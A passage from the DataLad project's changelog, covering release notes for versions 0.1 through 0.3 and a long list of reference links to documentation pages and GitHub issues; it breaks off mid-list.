and fieldmaps for better readability\n - supports `-d^` or `-d///` to point to top-most or centrally\n installed meta-datasets\n - \"complete\" paths to the datasets are reported now\n - `-s` option to specify which fields (only) to search\n- various enhancements and small fixes to [meta-data][] handling, [ls][],\n custom remotes, code-base formatting, downloaders, etc\n- completely switched to `tqdm` library (`progressbar` is no longer\n used/supported)\n\n\n# 0.3 (Sep 23, 2016) -- winter is coming\n\nLots of everything, including but not limited to\n\n- enhanced index viewer, as the one on http://datasets.datalad.org\n- initial new data providers support: [Kaggle][], [BALSA][], [NDA][], [NITRC][]\n- initial [meta-data support and management][]\n- new and/or improved crawler pipelines for [BALSA][], [CRCNS][], [OpenfMRI][]\n- refactored [install][] command, now with separate [get][]\n- some other commands renaming/refactoring (e.g., [create-sibling][])\n- datalad [search][] would give you an option to install datalad's\n super-dataset under ~/datalad if run outside of a dataset\n\n## 0.2.3 (Jun 28, 2016) -- busy OHBM\n\nNew features and bugfix release\n\n- support of /// urls to point to
http://datasets.datalad.org\n- variety of fixes and enhancements throughout\n\n## 0.2.2 (Jun 20, 2016) -- OHBM we are coming!\n\nNew feature and bugfix release\n\n- greately improved documentation\n- publish command API RFing allows for custom options to annex, and uses\n --to REMOTE for consistent with annex invocation\n- variety of fixes and enhancements throughout\n\n## 0.2.1 (Jun 10, 2016)\n\n- variety of fixes and enhancements throughout\n\n# 0.2 (May 20, 2016)\n\nMajor RFing to switch from relying on rdf to git native submodules etc\n\n# 0.1 (Oct 14, 2015)\n\nRelease primarily focusing on interface functionality including initial\npublishing\n\n[git-annex]: http://git-annex.branchable.com/\n[gx-sameas]: https://git-annex.branchable.com/tips/multiple_remotes_accessing_the_same_data_store/\n[duecredit]: https://github.com/duecredit/duecredit\n\n[Kaggle]: https://www.kaggle.com\n[BALSA]: http://balsa.wustl.edu\n[NDA]: http://data-archive.nimh.nih.gov\n[NITRC]: https://www.nitrc.org\n[CRCNS]: http://crcns.org\n[FCON1000]: http://fcon_1000.projects.nitrc.org\n[OpenfMRI]: http://openfmri.org\n\n[Configuration documentation]: http://docs.datalad.org/config.html\n\n[Dataset]: http://docs.datalad.org/en/latest/generated/datalad.api.Dataset.html\n[Sibling]: http://docs.datalad.org/en/latest/glossary.html\n\n[rfc822-compliant metadata]: http://docs.datalad.org/en/latest/metadata.html#rfc822-compliant-meta-data\n[meta-data support and management]: http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling\n[meta-data]: http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling\n\n[add-archive-content]: https://datalad.readthedocs.io/en/latest/generated/man/datalad-add-archive-content.html\n[add-sibling]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-add-sibling.html\n[add]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html\n[addurls]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html\n[annotate-paths]: http://docs.datalad.org/en/latest/generated/man/datalad-annotate-paths.html\n[clean]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-clean.html\n[clone]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html\n[config]: http://docs.datalad.org/en/latest/config.html\n[configuration]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-configuration.html\n[copy-file]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-copy-file.html\n[copy_to]: http://docs.datalad.org/en/latest/_modules/datalad/support/annexrepo.html?highlight=%22copy_to%22\n[create]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html\n[create-sibling-github]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html\n[create-sibling-ria]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-ria.html\n[create-sibling]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html\n[datalad]: http://docs.datalad.org/en/latest/generated/man/datalad.html\n[datalad-container]: https://github.com/datalad/datalad-container\n[datalad-revolution]: http://github.com/datalad/datalad-revolution\n[download-url]: https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html\n[diff]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html\n[drop]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html\n[export-archive-ora]: 
http://datalad.readthedocs.io/en/latest/generated/man/datalad-export-archive-ora.html\n[export]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-export.html\n[export_tarball]: http://docs.datalad.org/en/latest/generated/datalad.plugin.export_tarball.html\n[get]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html\n[install]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html\n[ls]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-ls.html\n[metadata]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-metadata.html\n[nd_freeze]: https://github.com/neurodebian/neurodebian/blob/master/tools/nd_freeze\n[plugin]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-plugin.html\n[publications]: https://datalad.readthedocs.io/en/latest/publications.html\n[publish]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html\n[push]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html\n[remove]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html\n[rerun]: https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html\n[run]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html\n[run-procedure]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html\n[save]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html\n[search]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html\n[siblings]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html\n[sshrun]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-sshrun.html\n[status]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html\n[subdatasets]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html\n[unlock]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html\n[update]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html\n[wtf]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html\n\n[handbook]: http://handbook.datalad.org\n[handbook-scalable-datastore]: http://handbook.datalad.org/en/latest/usecases/datastorage_for_institutions.html\n[hooks]: http://handbook.datalad.org/en/latest/basics/101-145-hooks.html\n[Flyweight pattern]: https://en.wikipedia.org/wiki/Flyweight_pattern\n[NO_COLOR]: https://no-color.org/\n\n[#5420]: https://github.com/datalad/datalad/issues/5420\n[#5428]: https://github.com/datalad/datalad/issues/5428\n[#5459]: https://github.com/datalad/datalad/issues/5459\n[#5554]: https://github.com/datalad/datalad/issues/5554\n[#5564]: https://github.com/datalad/datalad/issues/5564\n[#5672]: https://github.com/datalad/datalad/issues/5672\n[#1350]: https://github.com/datalad/datalad/issues/1350\n[#1651]: https://github.com/datalad/datalad/issues/1651\n[#2534]: https://github.com/datalad/datalad/issues/2534\n[#2566]: https://github.com/datalad/datalad/issues/2566\n[#2692]: https://github.com/datalad/datalad/issues/2692\n[#2702]: https://github.com/datalad/datalad/issues/2702\n[#2703]: https://github.com/datalad/datalad/issues/2703\n[#2707]: https://github.com/datalad/datalad/issues/2707\n[#2708]: https://github.com/datalad/datalad/issues/2708\n[#2710]: https://github.com/datalad/datalad/issues/2710\n[#2712]: https://github.com/datalad/datalad/issues/2712\n[#2717]: https://github.com/datalad/datalad/issues/2717\n[#2722]: 
https://github.com/datalad/datalad/issues/2722\n[#2723]: https://github.com/datalad/datalad/issues/2723\n[#2724]: https://github.com/datalad/datalad/issues/2724\n[#2725]: https://github.com/datalad/datalad/issues/2725\n[#2728]: https://github.com/datalad/datalad/issues/2728\n[#2731]: https://github.com/datalad/datalad/issues/2731\n[#2733]: https://github.com/datalad/datalad/issues/2733\n[#2735]: https://github.com/datalad/datalad/issues/2735\n[#2738]: https://github.com/datalad/datalad/issues/2738\n[#2741]: https://github.com/datalad/datalad/issues/2741\n[#2744]: https://github.com/datalad/datalad/issues/2744\n[#2752]: https://github.com/datalad/datalad/issues/2752\n[#2754]: https://github.com/datalad/datalad/issues/2754\n[#2761]: https://github.com/datalad/datalad/issues/2761\n[#2770]: https://github.com/datalad/datalad/issues/2770\n[#2773]: https://github.com/datalad/datalad/issues/2773\n[#2777]: https://github.com/datalad/datalad/issues/2777\n[#2788]: https://github.com/datalad/datalad/issues/2788\n[#2794]: https://github.com/datalad/datalad/issues/2794\n[#2795]: https://github.com/datalad/datalad/issues/2795\n[#2796]: https://github.com/datalad/datalad/issues/2796\n[#2798]: https://github.com/datalad/datalad/issues/2798\n[#2815]: https://github.com/datalad/datalad/issues/2815\n[#2835]: https://github.com/datalad/datalad/issues/2835\n[#2858]: https://github.com/datalad/datalad/issues/2858\n[#2859]: https://github.com/datalad/datalad/issues/2859\n[#2860]: https://github.com/datalad/datalad/issues/2860\n[#2861]: https://github.com/datalad/datalad/issues/2861\n[#2864]: https://github.com/datalad/datalad/issues/2864\n[#2865]: https://github.com/datalad/datalad/issues/2865\n[#2876]: https://github.com/datalad/datalad/issues/2876\n[#2878]: https://github.com/datalad/datalad/issues/2878\n[#2881]: https://github.com/datalad/datalad/issues/2881\n[#2886]: https://github.com/datalad/datalad/issues/2886\n[#2891]: https://github.com/datalad/datalad/issues/2891\n[#2892]: https://github.com/datalad/datalad/issues/2892\n[#2893]: https://github.com/datalad/datalad/issues/2893\n[#2894]: https://github.com/datalad/datalad/issues/2894\n[#2897]: https://github.com/datalad/datalad/issues/2897\n[#2900]: https://github.com/datalad/datalad/issues/2900\n[#2901]: https://github.com/datalad/datalad/issues/2901\n[#2902]: https://github.com/datalad/datalad/issues/2902\n[#2903]: https://github.com/datalad/datalad/issues/2903\n[#2904]: https://github.com/datalad/datalad/issues/2904\n[#2905]: https://github.com/datalad/datalad/issues/2905\n[#2909]: https://github.com/datalad/datalad/issues/2909\n[#2912]: https://github.com/datalad/datalad/issues/2912\n[#2914]: https://github.com/datalad/datalad/issues/2914\n[#2917]: https://github.com/datalad/datalad/issues/2917\n[#2918]: https://github.com/datalad/datalad/issues/2918\n[#2921]: https://github.com/datalad/datalad/issues/2921\n[#2922]: https://github.com/datalad/datalad/issues/2922\n[#2937]: https://github.com/datalad/datalad/issues/2937\n[#2946]: https://github.com/datalad/datalad/issues/2946\n[#2950]: https://github.com/datalad/datalad/issues/2950\n[#2952]: https://github.com/datalad/datalad/issues/2952\n[#2954]: https://github.com/datalad/datalad/issues/2954\n[#2958]: https://github.com/datalad/datalad/issues/2958\n[#2960]: https://github.com/datalad/datalad/issues/2960\n[#2972]: https://github.com/datalad/datalad/issues/2972\n[#2974]: https://github.com/datalad/datalad/issues/2974\n[#2982]: https://github.com/datalad/datalad/issues/2982\n[#2984]: 
https://github.com/datalad/datalad/issues/2984\n[#2991]: https://github.com/datalad/datalad/issues/2991\n[#2993]: https://github.com/datalad/datalad/issues/2993\n[#2995]: https://github.com/datalad/datalad/issues/2995\n[#3001]: https://github.com/datalad/datalad/issues/3001\n[#3002]: https://github.com/datalad/datalad/issues/3002\n[#3007]: https://github.com/datalad/datalad/issues/3007\n[#3009]: https://github.com/datalad/datalad/issues/3009\n[#3019]: https://github.com/datalad/datalad/issues/3019\n[#3025]: https://github.com/datalad/datalad/issues/3025\n[#3029]: https://github.com/datalad/datalad/issues/3029\n[#3035]: https://github.com/datalad/datalad/issues/3035\n[#3037]: https://github.com/datalad/datalad/issues/3037\n[#3038]: https://github.com/datalad/datalad/issues/3038\n[#3046]: https://github.com/datalad/datalad/issues/3046\n[#3049]: https://github.com/datalad/datalad/issues/3049\n[#3051]: https://github.com/datalad/datalad/issues/3051\n[#3057]: https://github.com/datalad/datalad/issues/3057\n[#3058]: https://github.com/datalad/datalad/issues/3058\n[#3061]: https://github.com/datalad/datalad/issues/3061\n[#3065]: https://github.com/datalad/datalad/issues/3065\n[#3066]: https://github.com/datalad/datalad/issues/3066\n[#3080]: https://github.com/datalad/datalad/issues/3080\n[#3089]: https://github.com/datalad/datalad/issues/3089\n[#3091]: https://github.com/datalad/datalad/issues/3091\n[#3098]: https://github.com/datalad/datalad/issues/3098\n[#3099]: https://github.com/datalad/datalad/issues/3099\n[#3102]: https://github.com/datalad/datalad/issues/3102\n[#3104]: https://github.com/datalad/datalad/issues/3104\n[#3106]: https://github.com/datalad/datalad/issues/3106\n[#3109]: https://github.com/datalad/datalad/issues/3109\n[#3115]: https://github.com/datalad/datalad/issues/3115\n[#3119]: https://github.com/datalad/datalad/issues/3119\n[#3124]: https://github.com/datalad/datalad/issues/3124\n[#3129]: https://github.com/datalad/datalad/issues/3129\n[#3137]: https://github.com/datalad/datalad/issues/3137\n[#3138]: https://github.com/datalad/datalad/issues/3138\n[#3141]: https://github.com/datalad/datalad/issues/3141\n[#3146]: https://github.com/datalad/datalad/issues/3146\n[#3149]: https://github.com/datalad/datalad/issues/3149\n[#3156]: https://github.com/datalad/datalad/issues/3156\n[#3164]: https://github.com/datalad/datalad/issues/3164\n[#3165]: https://github.com/datalad/datalad/issues/3165\n[#3168]: https://github.com/datalad/datalad/issues/3168\n[#3176]: https://github.com/datalad/datalad/issues/3176\n[#3180]: https://github.com/datalad/datalad/issues/3180\n[#3181]: https://github.com/datalad/datalad/issues/3181\n[#3184]: https://github.com/datalad/datalad/issues/3184\n[#3186]: https://github.com/datalad/datalad/issues/3186\n[#3196]: https://github.com/datalad/datalad/issues/3196\n[#3205]: https://github.com/datalad/datalad/issues/3205\n[#3210]: https://github.com/datalad/datalad/issues/3210\n[#3211]: https://github.com/datalad/datalad/issues/3211\n[#3215]: https://github.com/datalad/datalad/issues/3215\n[#3220]: https://github.com/datalad/datalad/issues/3220\n[#3222]: https://github.com/datalad/datalad/issues/3222\n[#3223]: https://github.com/datalad/datalad/issues/3223\n[#3238]: https://github.com/datalad/datalad/issues/3238\n[#3241]: https://github.com/datalad/datalad/issues/3241\n[#3242]: https://github.com/datalad/datalad/issues/3242\n[#3249]: https://github.com/datalad/datalad/issues/3249\n[#3250]: https://github.com/datalad/datalad/issues/3250\n[#3255]: 
https://github.com/datalad/datalad/issues/3255\n[#3258]: https://github.com/datalad/datalad/issues/3258\n[#3259]: https://github.com/datalad/datalad/issues/3259\n[#3268]: https://github.com/datalad/datalad/issues/3268\n[#3274]: https://github.com/datalad/datalad/issues/3274\n[#3281]: https://github.com/datalad/datalad/issues/3281\n[#3288]: https://github.com/datalad/datalad/issues/3288\n[#3289]: https://github.com/datalad/datalad/issues/3289\n[#3294]: https://github.com/datalad/datalad/issues/3294\n[#3298]: https://github.com/datalad/datalad/issues/3298\n[#3299]: https://github.com/datalad/datalad/issues/3299\n[#3301]: https://github.com/datalad/datalad/issues/3301\n[#3304]: https://github.com/datalad/datalad/issues/3304\n[#3314]: https://github.com/datalad/datalad/issues/3314\n[#3318]: https://github.com/datalad/datalad/issues/3318\n[#3322]: https://github.com/datalad/datalad/issues/3322\n[#3324]: https://github.com/datalad/datalad/issues/3324\n[#3325]: https://github.com/datalad/datalad/issues/3325\n[#3326]: https://github.com/datalad/datalad/issues/3326\n[#3329]: https://github.com/datalad/datalad/issues/3329\n[#3330]: https://github.com/datalad/datalad/issues/3330\n[#3332]: https://github.com/datalad/datalad/issues/3332\n[#3334]: https://github.com/datalad/datalad/issues/3334\n[#3336]: https://github.com/datalad/datalad/issues/3336\n[#3340]: https://github.com/datalad/datalad/issues/3340\n[#3343]: https://github.com/datalad/datalad/issues/3343\n[#3347]: https://github.com/datalad/datalad/issues/3347\n[#3353]: https://github.com/datalad/datalad/issues/3353\n[#3362]: https://github.com/datalad/datalad/issues/3362\n[#3364]: https://github.com/datalad/datalad/issues/3364\n[#3365]: https://github.com/datalad/datalad/issues/3365\n[#3366]: https://github.com/datalad/datalad/issues/3366\n[#3374]: https://github.com/datalad/datalad/issues/3374\n[#3378]: https://github.com/datalad/datalad/issues/3378\n[#3383]: https://github.com/datalad/datalad/issues/3383\n[#3396]: https://github.com/datalad/datalad/issues/3396\n[#3398]: https://github.com/datalad/datalad/issues/3398\n[#3400]: https://github.com/datalad/datalad/issues/3400\n[#3401]: https://github.com/datalad/datalad/issues/3401\n[#3403]: https://github.com/datalad/datalad/issues/3403\n[#3407]: https://github.com/datalad/datalad/issues/3407\n[#3425]: https://github.com/datalad/datalad/issues/3425\n[#3429]: https://github.com/datalad/datalad/issues/3429\n[#3435]: https://github.com/datalad/datalad/issues/3435\n[#3439]: https://github.com/datalad/datalad/issues/3439\n[#3440]: https://github.com/datalad/datalad/issues/3440\n[#3444]: https://github.com/datalad/datalad/issues/3444\n[#3447]: https://github.com/datalad/datalad/issues/3447\n[#3458]: https://github.com/datalad/datalad/issues/3458\n[#3459]: https://github.com/datalad/datalad/issues/3459\n[#3460]: https://github.com/datalad/datalad/issues/3460\n[#3470]: https://github.com/datalad/datalad/issues/3470\n[#3475]: https://github.com/datalad/datalad/issues/3475\n[#3476]: https://github.com/datalad/datalad/issues/3476\n[#3479]: https://github.com/datalad/datalad/issues/3479\n[#3492]: https://github.com/datalad/datalad/issues/3492\n[#3493]: https://github.com/datalad/datalad/issues/3493\n[#3498]: https://github.com/datalad/datalad/issues/3498\n[#3499]: https://github.com/datalad/datalad/issues/3499\n[#3508]: https://github.com/datalad/datalad/issues/3508\n[#3516]: https://github.com/datalad/datalad/issues/3516\n[#3518]: https://github.com/datalad/datalad/issues/3518\n[#3524]: 
https://github.com/datalad/datalad/issues/3524\n[#3525]: https://github.com/datalad/datalad/issues/3525\n[#3527]: https://github.com/datalad/datalad/issues/3527\n[#3531]: https://github.com/datalad/datalad/issues/3531\n[#3534]: https://github.com/datalad/datalad/issues/3534\n[#3538]: https://github.com/datalad/datalad/issues/3538\n[#3546]: https://github.com/datalad/datalad/issues/3546\n[#3547]: https://github.com/datalad/datalad/issues/3547\n[#3552]: https://github.com/datalad/datalad/issues/3552\n[#3555]: https://github.com/datalad/datalad/issues/3555\n[#3561]: https://github.com/datalad/datalad/issues/3561\n[#3562]: https://github.com/datalad/datalad/issues/3562\n[#3570]: https://github.com/datalad/datalad/issues/3570\n[#3574]: https://github.com/datalad/datalad/issues/3574\n[#3576]: https://github.com/datalad/datalad/issues/3576\n[#3579]: https://github.com/datalad/datalad/issues/3579\n[#3582]: https://github.com/datalad/datalad/issues/3582\n[#3586]: https://github.com/datalad/datalad/issues/3586\n[#3587]: https://github.com/datalad/datalad/issues/3587\n[#3591]: https://github.com/datalad/datalad/issues/3591\n[#3594]: https://github.com/datalad/datalad/issues/3594\n[#3597]: https://github.com/datalad/datalad/issues/3597\n[#3600]: https://github.com/datalad/datalad/issues/3600\n[#3602]: https://github.com/datalad/datalad/issues/3602\n[#3616]: https://github.com/datalad/datalad/issues/3616\n[#3622]: https://github.com/datalad/datalad/issues/3622\n[#3624]: https://github.com/datalad/datalad/issues/3624\n[#3626]: https://github.com/datalad/datalad/issues/3626\n[#3629]: https://github.com/datalad/datalad/issues/3629\n[#3631]: https://github.com/datalad/datalad/issues/3631\n[#3646]: https://github.com/datalad/datalad/issues/3646\n[#3648]: https://github.com/datalad/datalad/issues/3648\n[#3656]: https://github.com/datalad/datalad/issues/3656\n[#3667]: https://github.com/datalad/datalad/issues/3667\n[#3678]: https://github.com/datalad/datalad/issues/3678\n[#3680]: https://github.com/datalad/datalad/issues/3680\n[#3682]: https://github.com/datalad/datalad/issues/3682\n[#3688]: https://github.com/datalad/datalad/issues/3688\n[#3692]: https://github.com/datalad/datalad/issues/3692\n[#3693]: https://github.com/datalad/datalad/issues/3693\n[#3695]: https://github.com/datalad/datalad/issues/3695\n[#3700]: https://github.com/datalad/datalad/issues/3700\n[#3701]: https://github.com/datalad/datalad/issues/3701\n[#3702]: https://github.com/datalad/datalad/issues/3702\n[#3704]: https://github.com/datalad/datalad/issues/3704\n[#3705]: https://github.com/datalad/datalad/issues/3705\n[#3712]: https://github.com/datalad/datalad/issues/3712\n[#3715]: https://github.com/datalad/datalad/issues/3715\n[#3719]: https://github.com/datalad/datalad/issues/3719\n[#3728]: https://github.com/datalad/datalad/issues/3728\n[#3743]: https://github.com/datalad/datalad/issues/3743\n[#3746]: https://github.com/datalad/datalad/issues/3746\n[#3747]: https://github.com/datalad/datalad/issues/3747\n[#3749]: https://github.com/datalad/datalad/issues/3749\n[#3751]: https://github.com/datalad/datalad/issues/3751\n[#3754]: https://github.com/datalad/datalad/issues/3754\n[#3761]: https://github.com/datalad/datalad/issues/3761\n[#3765]: https://github.com/datalad/datalad/issues/3765\n[#3768]: https://github.com/datalad/datalad/issues/3768\n[#3769]: https://github.com/datalad/datalad/issues/3769\n[#3770]: https://github.com/datalad/datalad/issues/3770\n[#3772]: https://github.com/datalad/datalad/issues/3772\n[#3775]: 
https://github.com/datalad/datalad/issues/3775\n[#3776]: https://github.com/datalad/datalad/issues/3776\n[#3777]: https://github.com/datalad/datalad/issues/3777\n[#3780]: https://github.com/datalad/datalad/issues/3780\n[#3787]: https://github.com/datalad/datalad/issues/3787\n[#3791]: https://github.com/datalad/datalad/issues/3791\n[#3793]: https://github.com/datalad/datalad/issues/3793\n[#3794]: https://github.com/datalad/datalad/issues/3794\n[#3797]: https://github.com/datalad/datalad/issues/3797\n[#3798]: https://github.com/datalad/datalad/issues/3798\n[#3799]: https://github.com/datalad/datalad/issues/3799\n[#3803]: https://github.com/datalad/datalad/issues/3803\n[#3804]: https://github.com/datalad/datalad/issues/3804\n[#3807]: https://github.com/datalad/datalad/issues/3807\n[#3812]: https://github.com/datalad/datalad/issues/3812\n[#3815]: https://github.com/datalad/datalad/issues/3815\n[#3817]: https://github.com/datalad/datalad/issues/3817\n[#3821]: https://github.com/datalad/datalad/issues/3821\n[#3828]: https://github.com/datalad/datalad/issues/3828\n[#3831]: https://github.com/datalad/datalad/issues/3831\n[#3834]: https://github.com/datalad/datalad/issues/3834\n[#3842]: https://github.com/datalad/datalad/issues/3842\n[#3850]: https://github.com/datalad/datalad/issues/3850\n[#3851]: https://github.com/datalad/datalad/issues/3851\n[#3854]: https://github.com/datalad/datalad/issues/3854\n[#3856]: https://github.com/datalad/datalad/issues/3856\n[#3860]: https://github.com/datalad/datalad/issues/3860\n[#3862]: https://github.com/datalad/datalad/issues/3862\n[#3863]: https://github.com/datalad/datalad/issues/3863\n[#3871]: https://github.com/datalad/datalad/issues/3871\n[#3873]: https://github.com/datalad/datalad/issues/3873\n[#3877]: https://github.com/datalad/datalad/issues/3877\n[#3880]: https://github.com/datalad/datalad/issues/3880\n[#3888]: https://github.com/datalad/datalad/issues/3888\n[#3892]: https://github.com/datalad/datalad/issues/3892\n[#3903]: https://github.com/datalad/datalad/issues/3903\n[#3904]: https://github.com/datalad/datalad/issues/3904\n[#3906]: https://github.com/datalad/datalad/issues/3906\n[#3907]: https://github.com/datalad/datalad/issues/3907\n[#3911]: https://github.com/datalad/datalad/issues/3911\n[#3926]: https://github.com/datalad/datalad/issues/3926\n[#3927]: https://github.com/datalad/datalad/issues/3927\n[#3931]: https://github.com/datalad/datalad/issues/3931\n[#3935]: https://github.com/datalad/datalad/issues/3935\n[#3940]: https://github.com/datalad/datalad/issues/3940\n[#3954]: https://github.com/datalad/datalad/issues/3954\n[#3955]: https://github.com/datalad/datalad/issues/3955\n[#3958]: https://github.com/datalad/datalad/issues/3958\n[#3959]: https://github.com/datalad/datalad/issues/3959\n[#3960]: https://github.com/datalad/datalad/issues/3960\n[#3963]: https://github.com/datalad/datalad/issues/3963\n[#3970]: https://github.com/datalad/datalad/issues/3970\n[#3971]: https://github.com/datalad/datalad/issues/3971\n[#3974]: https://github.com/datalad/datalad/issues/3974\n[#3975]: https://github.com/datalad/datalad/issues/3975\n[#3976]: https://github.com/datalad/datalad/issues/3976\n[#3979]: https://github.com/datalad/datalad/issues/3979\n[#3996]: https://github.com/datalad/datalad/issues/3996\n[#3999]: https://github.com/datalad/datalad/issues/3999\n[#4002]: https://github.com/datalad/datalad/issues/4002\n[#4022]: https://github.com/datalad/datalad/issues/4022\n[#4036]: https://github.com/datalad/datalad/issues/4036\n[#4037]: 
https://github.com/datalad/datalad/issues/4037\n[#4041]: https://github.com/datalad/datalad/issues/4041\n[#4045]: https://github.com/datalad/datalad/issues/4045\n[#4046]: https://github.com/datalad/datalad/issues/4046\n[#4049]: https://github.com/datalad/datalad/issues/4049\n[#4050]: https://github.com/datalad/datalad/issues/4050\n[#4057]: https://github.com/datalad/datalad/issues/4057\n[#4060]: https://github.com/datalad/datalad/issues/4060\n[#4064]: https://github.com/datalad/datalad/issues/4064\n[#4065]: https://github.com/datalad/datalad/issues/4065\n[#4070]: https://github.com/datalad/datalad/issues/4070\n[#4073]: https://github.com/datalad/datalad/issues/4073\n[#4078]: https://github.com/datalad/datalad/issues/4078\n[#4080]: https://github.com/datalad/datalad/issues/4080\n[#4081]: https://github.com/datalad/datalad/issues/4081\n[#4087]: https://github.com/datalad/datalad/issues/4087\n[#4091]: https://github.com/datalad/datalad/issues/4091\n[#4099]: https://github.com/datalad/datalad/issues/4099\n[#4106]: https://github.com/datalad/datalad/issues/4106\n[#4124]: https://github.com/datalad/datalad/issues/4124\n[#4140]: https://github.com/datalad/datalad/issues/4140\n[#4147]: https://github.com/datalad/datalad/issues/4147\n[#4156]: https://github.com/datalad/datalad/issues/4156\n[#4157]: https://github.com/datalad/datalad/issues/4157\n[#4158]: https://github.com/datalad/datalad/issues/4158\n[#4159]: https://github.com/datalad/datalad/issues/4159\n[#4167]: https://github.com/datalad/datalad/issues/4167\n[#4168]: https://github.com/datalad/datalad/issues/4168\n[#4169]: https://github.com/datalad/datalad/issues/4169\n[#4170]: https://github.com/datalad/datalad/issues/4170\n[#4171]: https://github.com/datalad/datalad/issues/4171\n[#4172]: https://github.com/datalad/datalad/issues/4172\n[#4174]: https://github.com/datalad/datalad/issues/4174\n[#4175]: https://github.com/datalad/datalad/issues/4175\n[#4187]: https://github.com/datalad/datalad/issues/4187\n[#4194]: https://github.com/datalad/datalad/issues/4194\n[#4196]: https://github.com/datalad/datalad/issues/4196\n[#4200]: https://github.com/datalad/datalad/issues/4200\n[#4203]: https://github.com/datalad/datalad/issues/4203\n[#4206]: https://github.com/datalad/datalad/issues/4206\n[#4212]: https://github.com/datalad/datalad/issues/4212\n[#4214]: https://github.com/datalad/datalad/issues/4214\n[#4235]: https://github.com/datalad/datalad/issues/4235\n[#4239]: https://github.com/datalad/datalad/issues/4239\n[#4243]: https://github.com/datalad/datalad/issues/4243\n[#4245]: https://github.com/datalad/datalad/issues/4245\n[#4257]: https://github.com/datalad/datalad/issues/4257\n[#4260]: https://github.com/datalad/datalad/issues/4260\n[#4262]: https://github.com/datalad/datalad/issues/4262\n[#4268]: https://github.com/datalad/datalad/issues/4268\n[#4273]: https://github.com/datalad/datalad/issues/4273\n[#4274]: https://github.com/datalad/datalad/issues/4274\n[#4276]: https://github.com/datalad/datalad/issues/4276\n[#4285]: https://github.com/datalad/datalad/issues/4285\n[#4290]: https://github.com/datalad/datalad/issues/4290\n[#4291]: https://github.com/datalad/datalad/issues/4291\n[#4292]: https://github.com/datalad/datalad/issues/4292\n[#4296]: https://github.com/datalad/datalad/issues/4296\n[#4301]: https://github.com/datalad/datalad/issues/4301\n[#4303]: https://github.com/datalad/datalad/issues/4303\n[#4304]: https://github.com/datalad/datalad/issues/4304\n[#4305]: https://github.com/datalad/datalad/issues/4305\n[#4306]: 
https://github.com/datalad/datalad/issues/4306\n[#4308]: https://github.com/datalad/datalad/issues/4308\n[#4314]: https://github.com/datalad/datalad/issues/4314\n[#4315]: https://github.com/datalad/datalad/issues/4315\n[#4316]: https://github.com/datalad/datalad/issues/4316\n[#4317]: https://github.com/datalad/datalad/issues/4317\n[#4319]: https://github.com/datalad/datalad/issues/4319\n[#4321]: https://github.com/datalad/datalad/issues/4321\n[#4323]: https://github.com/datalad/datalad/issues/4323\n[#4324]: https://github.com/datalad/datalad/issues/4324\n[#4326]: https://github.com/datalad/datalad/issues/4326\n[#4328]: https://github.com/datalad/datalad/issues/4328\n[#4330]: https://github.com/datalad/datalad/issues/4330\n[#4331]: https://github.com/datalad/datalad/issues/4331\n[#4332]: https://github.com/datalad/datalad/issues/4332\n[#4337]: https://github.com/datalad/datalad/issues/4337\n[#4338]: https://github.com/datalad/datalad/issues/4338\n[#4342]: https://github.com/datalad/datalad/issues/4342\n[#4348]: https://github.com/datalad/datalad/issues/4348\n[#4354]: https://github.com/datalad/datalad/issues/4354\n[#4361]: https://github.com/datalad/datalad/issues/4361\n[#4367]: https://github.com/datalad/datalad/issues/4367\n[#4370]: https://github.com/datalad/datalad/issues/4370\n[#4375]: https://github.com/datalad/datalad/issues/4375\n[#4382]: https://github.com/datalad/datalad/issues/4382\n[#4398]: https://github.com/datalad/datalad/issues/4398\n[#4400]: https://github.com/datalad/datalad/issues/4400\n[#4409]: https://github.com/datalad/datalad/issues/4409\n[#4420]: https://github.com/datalad/datalad/issues/4420\n[#4421]: https://github.com/datalad/datalad/issues/4421\n[#4426]: https://github.com/datalad/datalad/issues/4426\n[#4430]: https://github.com/datalad/datalad/issues/4430\n[#4431]: https://github.com/datalad/datalad/issues/4431\n[#4435]: https://github.com/datalad/datalad/issues/4435\n[#4438]: https://github.com/datalad/datalad/issues/4438\n[#4439]: https://github.com/datalad/datalad/issues/4439\n[#4441]: https://github.com/datalad/datalad/issues/4441\n[#4448]: https://github.com/datalad/datalad/issues/4448\n[#4456]: https://github.com/datalad/datalad/issues/4456\n[#4459]: https://github.com/datalad/datalad/issues/4459\n[#4460]: https://github.com/datalad/datalad/issues/4460\n[#4463]: https://github.com/datalad/datalad/issues/4463\n[#4464]: https://github.com/datalad/datalad/issues/4464\n[#4471]: 